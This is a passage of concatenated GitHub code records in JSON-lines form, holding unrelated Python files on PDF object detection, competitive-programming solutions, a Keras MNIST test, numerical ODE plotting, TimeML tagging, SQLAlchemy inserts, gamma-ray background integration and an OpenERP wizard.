YOLOv5Detector(v7weights_path, conf_threshold, self.pdf_processor.pdf_images,\n yolo_folder)\n\n self.yolov5_detector.run_detection()\n self.yolov7_detector.run_detection()\n\n def extract_data(self, v5annotation_folder, v7annotation_folder):\n self.data_extractor = DataExtractor(self.pdf_processor.pdf_images, v7annotation_folder)\n extracted_data_v5 = self.data_extractor.extract_data_v5()\n extracted_data_v7 = self.data_extractor.extract_data_v7()\n combined_data = self.data_extractor.get_combined_data()\n return combined_data\n\n def load_ner_model(self, model_path, word2idx_path, tag2idx_path):\n self.ner_model = NERModel(model_path, word2idx_path, tag2idx_path)\n self.ner_model.load_model()\n\n\nAPI_KEY = \"7cd12d16-286f-4b6f-a42b-7d55557e5b65\" # Replace with your actual API key\n\napi_key_header = APIKeyHeader(name=\"NER_API_Key\")\n\n\ndef verify_api_key(api_key: str = Depends(api_key_header)):\n if api_key == API_KEY:\n return True\n else:\n raise HTTPException(status_code=403, detail=\"Invalid API key\")\n\n\n@app.post(\"/predict/inco\")\nasync def main(\n files: UploadFile = File(..., media_type=\"application/pdf\"),\n authorized: bool = Depends(verify_api_key),\n):\n # Process PDF\n pdf_path = \"/tmp/uploaded.pdf\" # Specify a temporary location for the uploaded PDF\n image_folder_path = \"/tmp/images\" # Specify a temporary location for storing images\n pdf_api = PDFAPI()\n pdf_api.process_pdf(pdf_path, image_folder_path)\n\n # Run YOLO Detection\n v5weights_path = \"/path/to/v5/weights.pt\"\n v7weights_path = \"/path/to/v7/weights.pt\"\n conf_threshold = 0.3\n yolo_folder = \"/path/to/yolov5\"\n pdf_api.run_yolo_detection(v5weights_path, v7weights_path, conf_threshold, yolo_folder)\n\n # Extract Data\n v5annotation_folder = pdf_api.yolov5_detector.get_annotations()\n v7annotation_folder = pdf_api.yolov7_detector.get_annotations()\n combined_data = pdf_api.extract_data(v5annotation_folder, v7annotation_folder)\n\n # Load NER Model\n ner_model_path = \"/path/to/ner/model.h5\"\n word2idx_path = \"/path/to/word2idx.pkl\"\n tag2idx_path = \"/path/to/tag2idx.pkl\"\n pdf_api.load_ner_model(ner_model_path, word2idx_path, tag2idx_path)\n\n # Test Sentence Sample\n test_sentence = \"Your test sentence here.\"\n sentence_data = pdf_api.ner_model.test_sentence_sample(test_sentence)\n\n return {\"combined_data\": combined_data, \"sentence_data\": sentence_data}\n","repo_name":"Sami-rana/Data_Science","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":28405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12559094495","text":"# 20056 마법사 상어와 파이어볼\n\nimport sys\nfrom copy import deepcopy\n\ninput = sys.stdin.readline\n\nN, M, K = map(int, input().split())\n\ndx = [-1, -1, 0, 1, 1, 1, 0, -1]\ndy = [0, 1, 1, 1, 0, -1, -1, -1]\n\nboard = [[[] for _ in range(N)] for _ in range(N)]\n\ntmp_board = [[[] * N] * N for _ in range(N)]\n\n\nfor _ in range(M):\n r, c, m, s, d = map(int, input().split())\n if m != 0:\n board[r - 1][c - 1].append([m, s, d])\n\n\nfor _ in range(K):\n tmp_board = [[[] for _ in range(N)] for _ in range(N)]\n\n for x in range(N):\n for y in range(N):\n if board[x][y] != []:\n fire_len = len(board[x][y])\n for f in range(fire_len):\n nm, ns, nd = board[x][y][f]\n nx, ny = x + dx[nd] * ns, y + dy[nd] * ns\n nx = (nx + N) % N\n ny = (ny + N) % N\n tmp_board[nx][ny].append([nm, ns, nd])\n\n for x in range(N):\n for y in range(N):\n fire_len = len(tmp_board[x][y])\n if fire_len > 1:\n total_m, total_s, total_d = 0, 0, []\n for f in range(fire_len):\n total_m += tmp_board[x][y][f][0]\n total_s += tmp_board[x][y][f][1]\n total_d.append(tmp_board[x][y][f][2] % 2)\n total_m = int(total_m / 5)\n total_s = int(total_s / fire_len)\n tmp_board[x][y] = []\n\n if total_m != 0:\n if sum(total_d) == 0 or sum(total_d) == fire_len:\n for i in range(4):\n tmp_board[x][y].append([total_m, total_s, i * 2])\n else:\n for j in range(4):\n tmp_board[x][y].append([total_m, total_s, j * 2 + 1])\n\n board = deepcopy(tmp_board)\n\n\nsum_m = 0\nfor x in range(N):\n for y in range(N):\n if board[x][y] != []:\n for b in range(len(board[x][y])):\n sum_m += board[x][y][b][0]\n\nprint(sum_m)\n","repo_name":"ohjooyeong/PS","sub_path":"Baekjoon/20056.py","file_name":"20056.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73668628268","text":"from time import time\ndef somma(n):\n if n==1:\n return 1\n else: \n return n+somma(n-1)\n\n\n\ndef sommaquadrata(n):\n if n==1:\n return 1\n else: \n return n**2+sommaquadrata(n-1)\n\nstart_t = time()\nprint(somma(100)**2-sommaquadrata(100))\n\nprint(time() - start_t)\n","repo_name":"ku-alps/sw17_kiseok","sub_path":"Projecteuler/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40643442314","text":"a = set(int(i) for i in input().split())\nb = list(a)\nif 11 not in a: a.add(11)\nprint(a)\nrespair = []\nsorted(a)\nfor i in b:\n if(b.count(11 - i) != 0):\n respair.append((i, 11 - i))\nrespair = set(respair)\nrespair = tuple(respair)\nprint(11*len(respair) / 2)","repo_name":"NewbieNCuong/HIT_Private_Python","sub_path":"Homework_Day_5/Task5.py","file_name":"Task5.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8394439191","text":"\"\"\"\nTitle: Simple MNIST convnet\nAuthor: [fchollet](https://twitter.com/fchollet)\nDate created: 2015/06/19\nLast modified: 2020/04/21\nDescription: A simple convnet that achieves ~99% test accuracy on MNIST.\n\nW&B Notes:\n - From https://keras.io/examples/vision/mnist_convnet/\n - Source: https://github.com/keras-team/keras-io/blob/master/examples/vision/mnist_convnet.py\n - Added import magic line\n - Added lines to limit training data\n - Added flake8 noqa\n - Added random seed code\n\"\"\"\n\n# flake8: noqa\n\n\"\"\"\n## Setup\n\"\"\"\n\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom wandb import magic\n\n# Make sure this is reproducible\nnp.random.seed(1)\nimport tensorflow as tf\n\ntf.random.set_seed(2)\n\n\"\"\"\n## Prepare the data\n\"\"\"\n\n# Model / data parameters\nnum_classes = 10\ninput_shape = (28, 28, 1)\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()\n\n# Scale images to the [0, 1] range\nx_train = x_train.astype(\"float32\") / 255\nx_test = x_test.astype(\"float32\") / 255\n# Make sure images have shape (28, 28, 1)\nx_train = np.expand_dims(x_train, -1)\nx_test = np.expand_dims(x_test, -1)\nprint(\"x_train shape:\", x_train.shape)\nprint(x_train.shape[0], \"train samples\")\nprint(x_test.shape[0], \"test samples\")\n\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\n# limit training data\ndata_slice = 3000\nx_train = x_train[:data_slice, :]\ny_train = y_train[:data_slice, :]\nx_test = x_test[:data_slice, :]\ny_test = y_test[:data_slice, :]\n\n\"\"\"\n## Build the model\n\"\"\"\n\nmodel = keras.Sequential(\n [\n keras.Input(shape=input_shape),\n layers.Conv2D(32, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Conv2D(64, kernel_size=(3, 3), activation=\"relu\"),\n layers.MaxPooling2D(pool_size=(2, 2)),\n layers.Flatten(),\n layers.Dropout(0.5),\n layers.Dense(num_classes, activation=\"softmax\"),\n ]\n)\n\nmodel.summary()\n\n\"\"\"\n## Train the model\n\"\"\"\n\nbatch_size = 128\nepochs = 2\n\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\nmodel.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=0.1)\n\n\"\"\"\n## Evaluate the trained model\n\"\"\"\n\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Test loss:\", score[0])\nprint(\"Test accuracy:\", score[1])\n","repo_name":"wandb/wandb","sub_path":"tests/functional_tests/t0_main/magic/t1_mnist_convnet.py","file_name":"t1_mnist_convnet.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"27612966650","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\na = 0\nb = 5\nn = 25\nx = np.linspace(a,b,n)\nh = (b-a)/(n+1) #interval\ny=[]\ntempy = 1\nfor i in range(n):\n\ty.append(tempy)\n\tyn1 = 1 - x[i]*tempy\n\tyn2 = -x[i]*yn1 -tempy\n\tyn3 = -x[i]*yn2 - 2*yn1 \n\ttempy = tempy + yn1*h+yn2*h**2/2 + yn3*h**3/6\n\n#Plotting\nplt.plot(x,y)\nplt.grid()\nplt.xlabel('$x$')\nplt.ylabel('$y$')\n\n#Comment the following line\n#plt.savefig('../figs/taylor.eps')\nplt.show()\n\n","repo_name":"gadepall/numerical_methods","sub_path":"ode/manual/codes/taylor.py","file_name":"taylor.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39101937728","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nsys.path.append('..')\nfrom models.run_net import BarDetNet\nfrom prepare_data.gen_data_batch import gen_data_batch\nfrom config import cfg\nimport cv2\nimport os\nimport re\nfrom PIL import Image\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n\ndef test(img_path):\n dim_w = 608\n dim_h = 608\n g_step = 40000\n is_training = False\n t = 0.5\n\n imgs_holder = tf.placeholder(tf.float32, shape=[1, dim_h, dim_w, 3])\n model = BarDetNet(imgs_holder, None, is_training)\n img_hw = tf.placeholder(dtype=tf.float32, shape=[2])\n boxes, scores, classes = model.predict(img_hw, iou_threshold=0.5, score_threshold=t)\n\n saver = tf.train.Saver()\n ckpt_dir = re.sub(r'examples/', '', cfg.ckpt_path_608)\n imgs = os.listdir(img_path)\n\n with tf.Session() as sess:\n configer = tf.ConfigProto()\n configer.gpu_options.per_process_gpu_memory_fraction = 0.3\n sess=tf.Session(config=configer)\n ckpt = tf.train.get_checkpoint_state(ckpt_dir)\n print(ckpt.model_checkpoint_path)\n #saver.restore(sess, ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt_dir+str(g_step)+'_charbar.ckpt-'+str(g_step+1))\n\n for i in imgs:\n if 'png' not in i:\n continue\n\n image_path = os.path.join(img_path, i)\n image = cv2.imread(image_path)\n image = cv2.resize(image, (608,608))\n h, w, c = image.shape\n image_data = np.array(image, dtype='float32') / 255.0\n\n boxes_, scores_, classes_ = sess.run([boxes, scores, classes], feed_dict={img_hw:[h ,w], imgs_holder: np.reshape(image_data, [1, dim_h, dim_w, 3])})\n\n print(scores_)\n img = np.floor(image_data * 255 + 0.5).astype('uint8')\n for i in range(boxes_.shape[0]):\n box = boxes_[i]\n y_top, x_left, y_bottom, x_right = box\n cv2.rectangle(img, (int(x_left), int(y_top)), (int(x_right), int(y_bottom)), (0,0,0), 1)\n cv2.imshow('res', img)\n cv2.waitKey(0)\n\nif __name__ == '__main__':\n image_path = '../data/test_imgs/'\n test(image_path)\n","repo_name":"vicwer/bar_char_det_rec","sub_path":"bar_chart_detect/examples/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5460058070","text":"import xml.etree.ElementTree as ET\nimport json\nimport re\n\n#Se vor parsa datele din dictionar dupa care se va citii textul dintr-un fisier txt ce va fii impartit in propozitii si se vor adauga tagurile corespunzatoare pentru fiecare sectiune. Folosind datele din dictionare identificam diversele elemente temporale din text pe care le incadram in tagul TIMEEX cu valorile corespunzatoare (id, value, type etc).\n\n\n\ninput_file = \"\"\n\n\ndef setare_input(input_file_tmp):\n global input_file\n input_file = input_file_tmp\n\n\ndef rulare():\n with open(\"tmp\\\\dict_export\", \"r\") as fd:\n dictionar = json.load(fd)\n print(\"Dictionar : \", dictionar)\n\n # split in sentences\n with open(input_file, 'r') as f:\n content = f.read()\n # print(content)\n sentences = content.split(\"?.!,\")\n print(sentences)\n print()\n # sentences = content.split(\".\")\n # print(\"Sentences : \", sentences)\n\n xml_doc = ET.Element('TimeML')\n\n # DOCNO tag\n DOCNO = ET.SubElement(xml_doc, 'DOCNO', type='date', temporalFunction='false').text = '19980108'\n\n # DOCTYPE tag\n DOCTYPE = ET.SubElement(xml_doc, 'DOCTYPE', SOURCE='extract.txt').text = 'TimeEx'\n\n # BODY tag\n BODY = ET.SubElement(xml_doc, 'BODY')\n\n # TEXT tag\n TEXT = ET.SubElement(BODY, 'TEXT')\n ok = 1\n # s tag (sentences)\n for i in sentences:\n s = ET.SubElement(TEXT, 's')\n for key, values in dictionar.items():\n for value in values:\n if value in i:\n # print(\"Value : \", value)\n # TIMEEX tag\n tag = ET.SubElement(s, 'TIMEEX', id='t' + str(ok), value=value, type=key, temporalFunction='true',\n functionInDocument='NONE').text = value\n ok = ok + 1\n # print(ok)\n\n tree = ET.ElementTree(xml_doc)\n tree.write('output/exemplu.xml', encoding='UTF-8', xml_declaration=True)\n\n\nif __name__ == '__main__':\n # raise Exception(\"Run the app from main.py\")\n setare_input(\"..\\\\..\\\\input\\\\extract.txt\")\n rulare()\n","repo_name":"paulsem/TILN","sub_path":"TimeEx/XML/xml_project.py","file_name":"xml_project.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7462200696","text":"from functools import reduce\r\n\r\ndef CheckEven(no):\r\n if (no % 2==0):\r\n return True\r\n else:\r\n return False\r\n\r\ndef Increase(no):\r\n return no + 2\r\n\r\ndef add(A, B):\r\n return A + B\r\n\r\ndef main():\r\n data = [5, 4, 9, 8, 13, 17, 12, 18] #hardcoded list is predefined\r\n print(data)\r\n\r\n filter_output = list(filter(CheckEven, data))\r\n print(filter_output)\r\n\r\n map_output = list(map(Increase, filter_output))\r\n print(map_output)\r\n\r\n reduce_output = reduce(add, map_output)\r\n print(reduce_output)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n#program to check even odd using filter map reduce","repo_name":"iamchaitanya7/Py-Filter-Map-Reduce-LambdaFunc","sub_path":"FMR1.py","file_name":"FMR1.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3624194939","text":"import os\nimport math\nimport gammalib\nimport matplotlib.pyplot as plt\n\n\n# ========================================= #\n# Integrate using Trapezoid rule in log-log #\n# ========================================= #\ndef integrate_trapezoid_loglog(bkg, logE1, logE2):\n \"\"\"\n Integrate using Trapezoid rule in log-log\n \"\"\"\n # Get function values\n logf1 = math.log(bkg(logE1, 0.0, 0.0))\n logf2 = math.log(bkg(logE2, 0.0, 0.0))\n \n # Compute ln of energy boundaries\n lnE1 = logE1 * gammalib.ln10\n lnE2 = logE2 * gammalib.ln10\n \n # Compute integral using Trapezoid rule in log-log\n integral = (lnE2 - lnE1) * (math.exp(lnE1 + logf1) +\n math.exp(lnE2 + logf2)) * 0.5\n\n # Return integral\n return integral\n\n\n# ========================================= #\n# Integrate using Trapezoid rule in lin-lin #\n# ========================================= #\ndef integrate_trapezoid_linlin(bkg, logE1, logE2):\n \"\"\"\n Integrate using Trapezoid rule in lin-lin\n \"\"\"\n # Set number of energy bins\n nbins = 1000\n\n # Compute log energy bin size\n dlogE = (logE2-logE1)/float(nbins-1)\n\n # Perform integration\n integral = 0.0\n for i in range(nbins-1):\n logE_low = logE1 + i*dlogE\n logE_high = logE_low + dlogE\n dE = math.pow(10.0, logE_high) - math.pow(10.0, logE_low)\n integral += dE * (bkg(logE_low, 0.0, 0.0) + bkg(logE_high, 0.0, 0.0)) * 0.5\n\n # Return integral\n return integral\n\n\n# =============== #\n# Plot background #\n# =============== #\ndef plot_background(bkg, emin=0.020, emax=120.0):\n \"\"\"\n Plot background\n \"\"\"\n # Generate energy vector\n energies = gammalib.GEnergies(100, gammalib.GEnergy(emin,'TeV'),\n gammalib.GEnergy(emax,'TeV'))\n\n # Set energy values\n x = [energy.TeV() for energy in energies]\n y = [bkg(energy.log10TeV(), 0.0, 0.0) for energy in energies]\n\n # Get node energies\n i_eng = bkg.table().axis('ENERG')\n e_nodes = bkg.table().axis_nodes(i_eng)\n xo = [math.pow(10.0,logE) for logE in e_nodes]\n yo = [bkg(logE, 0.0, 0.0) for logE in e_nodes]\n\n # Compute integrals\n for i in range(len(xo)-1):\n if yo[i] > 0 and yo[i+1] > 0:\n integral_loglog = integrate_trapezoid_loglog(bkg, e_nodes[i], e_nodes[i+1])\n integral_linlin = integrate_trapezoid_linlin(bkg, e_nodes[i], e_nodes[i+1])\n print('%f-%f: %e %e (%f)' % (xo[i], xo[i+1], integral_loglog,\n integral_linlin,\n integral_loglog/integral_linlin))\n\n # Create figure\n plt.figure(1)\n plt.title('CTA Background')\n\n # Plot background\n plt.loglog(x, y, 'r-')\n plt.loglog(xo, yo, 'ro')\n\n # Set axes\n plt.xlabel(\"Energy (TeV)\")\n plt.ylabel(\"Background (events/s/MeV/sr)\")\n\n # Show plot\n plt.show()\n\n\n# ======================== #\n# Main routine entry point #\n# ======================== #\nif __name__ == '__main__':\n\n # Load background\n bkg = gammalib.GCTABackground3D('../../caldb/data/cta/prod2/bcf/South_50h/irf_file.fits')\n print(bkg)\n\n # Plot background\n plot_background(bkg)\n","repo_name":"gammalib/gammalib","sub_path":"inst/cta/test/dev/test_background_integration.py","file_name":"test_background_integration.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"12916759499","text":"import pandas as pd\nimport sys \nimport os\nimport argparse\nimport fnmatch\nimport collections\nimport gzip\n\ndir=\"/hpc/hub_oudenaarden/edann/hexamers\"\nfiles=[]\nfor file in os.listdir(dir):\n if fnmatch.fnmatch(file, 'TSS_rand.*'):\n files.append(dir+\"/\"+file)\n\n\ntss_dist_dic={}\nwith open(files[0], \"rb\") as f:\n\tfor line in f:\n\t\taline=line.decode().strip('\\n').split('\\t')\n\t\tif len([float(i) for i in aline[1:]])==5995:\n\t\t\ttss_dist_dic[aline[0]]=[float(i) for i in aline[1:]]\n\t\telse:\n\t\t\tprint(\"Error! Unexpected number of values in line \"+ aline[0])\n\t\t# cov_dict['\\t'.join([aline[i] for i in [0,1,2]])]=[int(i) for i in aline[4:]]\n\nfor file in files[1:]:\n\twith open(file,'rb') as f:\n\t\tfor line in f:\n\t\t\taline=line.decode().strip('\\n').split('\\t')\n\t\t\tif aline[0] not in tss_dist_dic.keys():\n\t\t\t\ttss_dist_dic[aline[0]]=[0]*5994\n\t\t\tif len([float(i) for i in aline[1:]])==5995 and aline[0]!=\"hex\":\n\t\t\t\tprint(\"File: \"+file+ \" Processing hex \"+aline[0]+\"...\")\t\n\t\t\t\ttss_dist_dic[aline[0]]=list(pd.Series(tss_dist_dic[aline[0]])+pd.Series([float(i) for i in aline[1:]]))\n\t\t\telse:\n\t\t\t\tprint(\"Error! Unexpected number of values in line \"+ aline[0])\n\noutput_file=dir+\"/sumRand_distances_conv.txt\"\ncolNames=tss_dist_dic.pop(\"hex\")\n# print('hex,'+','.join([str(v) for v in colNames]))\nwith open(output_file, \"w\") as output:\n\tprint('hex,'+','.join([str(v) for v in colNames]), file=output)\n\tfor key,val in tss_dist_dic.items():\n\t\tprint(key+','+','.join([str(v) for v in val]), file=output)","repo_name":"emdann/HexamerBias","sub_path":"base_composition/mergeTSStab.py","file_name":"mergeTSStab.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"73949511786","text":"f_num=int(input(\"how many fibonnaci numbers do you want to write?: \"))\na=0\nb=1\nd=[1]\nfor i in range(f_num-1):\n a=b+i\n d.append(a)\n if a==3:\n for _ in range(4,f_num-1):\n e=d[-1]+d[-2]\n d.append(e)\nprint(d)\n\n \n \n \n\n \n \n \n \n \n \n\n","repo_name":"k23040198/270201041","sub_path":"lab5/example5.py","file_name":"example5.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28813833754","text":"import asyncio\nimport os\nimport ssl\n\nfrom sqlalchemy import Column, FetchedValue\nfrom sqlalchemy.dialects.postgresql import JSONB, UUID\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import sessionmaker, declarative_base\n\nBase = declarative_base()\n\n\nclass Flow(Base):\n id = Column(UUID, primary_key=True, name='id', server_default=FetchedValue())\n data = Column(JSONB, name='data')\n __tablename__ = \"flow\"\n\n\nasync def async_main():\n engine_kwargs = {}\n if \"CA_CERT\" in os.environ:\n sslctx = ssl.create_default_context(\n ssl.Purpose.SERVER_AUTH,\n cafile=os.environ[\"CA_CERT\"]\n )\n sslctx.check_hostname = False\n engine_kwargs[\"connect_args\"] = {\n \"ssl\": sslctx\n }\n engine = create_async_engine(\n os.environ[\"DATABASE_URL\"],\n **engine_kwargs\n )\n async_session: AsyncSession = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\n async with async_session() as session:\n async with session.begin():\n flow = Flow(data={\"status\": \"new\", \"metadata\": {\"bankId\": \"123\"}})\n session.add(flow)\n print(\"Hi\")\n\n\nasyncio.run(async_main())\n","repo_name":"obeleh/cockroach-async-loadtest","sub_path":"minimal.py","file_name":"minimal.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70115585068","text":"__author__ = \"www.eficent.com\"\n\n\nimport wizard\nimport netsvc\nimport pooler\nfrom tools.translate import _\nimport time\nfrom datetime import datetime\n\nclass wizard_invoice_number_repair(wizard.interface):\n \"\"\"\n Invoice number repair wizard.\n \"\"\"\n\n ############################################################################\n # Init form\n ############################################################################\n\n _init_fields = {\n }\n\n _init_form = \"\"\"\n
\n